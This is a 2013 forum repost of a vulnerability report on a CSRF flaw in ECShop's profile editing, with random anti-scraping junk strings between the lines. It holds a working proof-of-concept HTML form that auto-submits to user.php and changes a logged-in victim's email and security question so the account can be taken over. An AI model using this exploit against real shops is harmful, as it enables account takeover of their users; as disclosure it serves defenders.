中国网络渗透测试联盟
标题:
ecshop修改任意用户密码漏洞的CSRF利用
[打印本页]
作者:
admin
时间:
2013-2-20 08:30
标题:
ecshop修改任意用户密码漏洞的CSRF利用
简要描述:
) @& f) t$ M- r& {# f* h, U$ X
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
- X" O# H+ z- d. ^( R; O
8 b, x, U# e, |( h" A8 x* ~
Demo For:
http://www.wooyun.org/bug.php?action=view&id=395
. D, ]) J* c) X6 e9 L6 ^$ s
0 n" P6 T3 D: h6 w0 `
详细说明:
& F7 e9 n! f' B; J+ S- T0 N* T
利用csrf和xss可以突破官方所说的“障碍”
( ^$ z* @- Q7 G7 V7 ?3 @# A$ V( j. G
xss版本已经有人说明
! ?, J6 F+ I8 |; v! D$ y- g
这里给出csrf版本
$ l M% W/ U' ~1 Z4 z9 K( Z6 ~8 l
% A$ O% b* u6 e' n& g( Q* L! L
漏洞证明:
J2 {9 Q+ G% C1 d
<html>
2 A2 j9 j5 T3 W5 m- _+ X( {
<body>
* `+ P5 K% G. I0 J0 X( y0 W2 O
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
0 e( }$ b/ v- Z: g" O& A
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
! Q; D1 r ^2 f, K+ ^
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
( I1 |5 n2 z0 |5 }: r ^& G" [
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
7 W) `+ Z2 X6 {7 I
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
' X! p- S# \2 @# T
</body>
, s. I4 T% V& `
<script>
) H v# Q/ s" _: y+ o! @
document.forms[0].submit();
0 y9 a% d z: g2 @
</script>
: ^' \6 i' t& }/ }
</html>
% C5 ]# c% u) y$ Q( R2 \: H
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
8 w" A+ a9 ]8 O# l5 c3 o* @
& O4 C# I0 {! v. W
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2